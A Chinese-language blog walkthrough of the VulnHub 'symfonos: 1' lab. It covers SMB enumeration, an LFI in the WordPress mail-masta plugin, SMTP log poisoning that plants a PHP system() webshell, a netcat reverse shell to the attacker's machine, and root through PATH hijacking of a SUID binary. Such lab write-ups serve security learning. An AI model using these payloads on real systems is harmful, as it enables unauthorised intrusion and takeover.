首页 > 其他分享 >学习笔记-symfonos1-WalkThrough

学习笔记-symfonos1-WalkThrough

时间:2022-11-04 14:26:01浏览次数:85  
标签:http h3l105 symfonos 192.168 WalkThrough 笔记 symfonos1 mail local

symfonos1-WalkThrough


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


靶机地址

Description

Beginner real life based machine designed to teach a interesting way of obtaining a low priv shell. SHOULD work for both VMware and Virtualbox.

  • Name: symfonos: 1
  • Difficulty: Beginner
  • Tested: VMware Workstation 15 Pro & VirtualBox 6.0
  • DHCP Enabled

Note: You may need to update your host file for symfonos.local

知识点

  • smb 信息探测
  • wordpress 插件 LFI 漏洞
  • SMTP 日志投毒

实验环境

环境仅供参考

  • VMware® Workstation 15 Pro - 15.0.0 build-10134415
  • kali : NAT 模式,192.168.141.134
  • 靶机 : NAT 模式

前期-信息收集

开始进行 IP 探活

nmap -sP 192.168.141.0/24

排除法,去掉自己、宿主机、网关, 192.168.141.148 就是目标了

扫描开放端口

nmap -T5 -A -v -p- 192.168.141.148

开放的蛮多的,22、25、80、139、445,既然 445 开着,就跑一下 SMB 探测的工具

enum4linux 192.168.141.148

有1个 /anonymous 可访问

smbclient //192.168.141.148/anonymous -U % -N

这里 -U 表示用户名,% 表示用户名。

参数 -N 用于空密码

有个文本文件,下下来看看

get attention.txt

按照文件所说,密码应该就是

epidioko
qwerty
baseball

虽然可能是 SSH 的密码,不过没有用户名,还是先放一放再说,不过刚刚枚举 smb 时发现存在1个要密码的目录

helios

说不定是这个的密码,连接试试

smbclient //192.168.141.148/helios -U helios

把文件down下来看看

get research.txt
get todo.txt

research.txt 没什么帮助,todo 里提示了 /h3l105 ,这个 / 就很灵性了,一般就可以猜想到和 web 有关

下面看一看 web 服务

先按要求添加以下 hosts 文件

echo "192.168.141.148 symfonos.local" >> /etc/hosts

啥都没有, /h3l105 试试

wordpress! 到了使用 wpscan 的时候了

wpscan --url http://symfonos.local/h3l105/
wpscan --url http://symfonos.local/h3l105/ --enumerate u
wpscan --url http://symfonos.local/h3l105/ --api-token xxxxxxx
wpscan --url http://symfonos.local/h3l105/ -e p --api-token xxxxxxx你的apitokenxxxx

5.2.2 版本,只有 admin 一个用户,不过倒是有几个插件漏洞

SQL 注入里面有几个需要认证,这个没有,测一测 LFI


中期-漏洞利用

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

可以,下面尝试从其他文件得到一些信息

http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios

既然可以读邮件,那么可以尝试一下密码找回

使用重置后的密码登录后台,尝试拿 shell 无果,google 后发现有人使用 SMTP 日志投毒配合 LFI 来进行 RCE https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/

跟着大佬学

telnet 192.168.141.148 25
MAIL FROM: <test>
RCPT TO: Helios
data
<?php system($_GET['a']);?>
.
quit

访问 helios 邮件 http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=ip a 测试

可以执行,测试回弹 shell,kali 监听

nc -lvp 4444

访问 http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&a=nc -nv 192.168.141.134 4444 -e /bin/bash

回弹成功,下面提权


后期-提权

python -c 'import pty; pty.spawn("/bin/bash")'
sudo -l
find / -perm -u=s 2>/dev/null

看上去啥也没有,尝试用下提权脚本

这里有个不常见的 suid 文件 statuscheck,看看是干嘛的

type /opt/statuscheck
ls -l /opt
/opt/statuscheck

内容看上去是个 web 的请求包,用 strings 在看看

strings /opt/statuscheck

看上去是使用 curl 访问本地网页, curl -I http://localhost

这里可以写一个自定义的 curl 文件,让其提权

cd /tmp
echo $'#!/bin/sh\n/bin/sh' > curl
chmod +x curl
export PATH=$(pwd):$PATH
/opt/statuscheck
whoami
cd /root
ls
cat proof.txt

提权成功,感谢靶机作者 Zayotic

点击关注,共同学习!
安全狗的自我修养

github haidragon

https://github.com/haidragon

标签:http,h3l105,symfonos,192.168,WalkThrough,笔记,symfonos1,mail,local
From: https://www.cnblogs.com/haidragon/p/16857601.html

相关文章

  • 学习笔记-symfonos2-WalkThrough
    symfonos2-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub......
  • 学习笔记-symfonos3-WalkThrough
    symfonos3-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub......
  • 学习笔记-symfonos5-WalkThrough
    symfonos5-WalkThrough免责声明本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.靶机地址https://www.vulnhub......
  • Attention is all you need-论文阅读笔记
    摘要主流的序列转换模型都是基于复杂的循环或者卷积神经网络,需要进行解码器和编码器处理。表现最好的模型也是基于注意力机制,并连接编码器和解码器。本文提出一个新的简单......
  • 第十周第十二章学习笔记
    第十二章学习笔记12.1块设备I/O缓冲区I/O缓冲的基本原理非常简单。文件系统使用一系列I/O缓冲区作为块设备的缓存内存。当进程试图读取(dev,blk)标识的磁盘块时。它首先在......
  • 《what's the point: semantic segmentation with point supervision 》阅读笔记
    摘要语义分割任务在发展中呈现这样的矛盾,在推理的准确性和标注所花费的时间之间。逐像素的细节标注可以训练更准确的模型,但要花费更多的时间。图片级别的标注是一个容易实......
  • (笔记)ROS2:ament_cmake类型功能包导入消息接口三步骤
     一、三个步骤1.在CMakeLists.txt中导入,具体是先find_packages再ament_target_dependencies。2.在packages.xml中导入,具体是添加depend标签并将消息接口写入。3.......
  • IS-IS动态路由协议笔记(中)路由计算方法
    IS-IS动态路由协议笔记(中)路由计算方法中间系统到中间系统(IS-IS,Intermediatesystemtointermediatesystem,读作“i-sys”)是一种内部网关协议,是电信运营商普遍采用的......
  • 最优化理论 第一章笔记( B站龙强老师的课 )
    第一章预备知识第1.2节最优化问题举例第1.3节最优化问题的模型及分类第1.4节凸集和凸函数第1.5节数学预备知识......
  • JVM学习笔记——垃圾回收篇
    JVM学习笔记——垃圾回收篇在本系列内容中我们会对JVM做一个系统的学习,本片将会介绍JVM的垃圾回收部分我们会分为以下几部分进行介绍:判断垃圾回收对象垃圾回收算法分......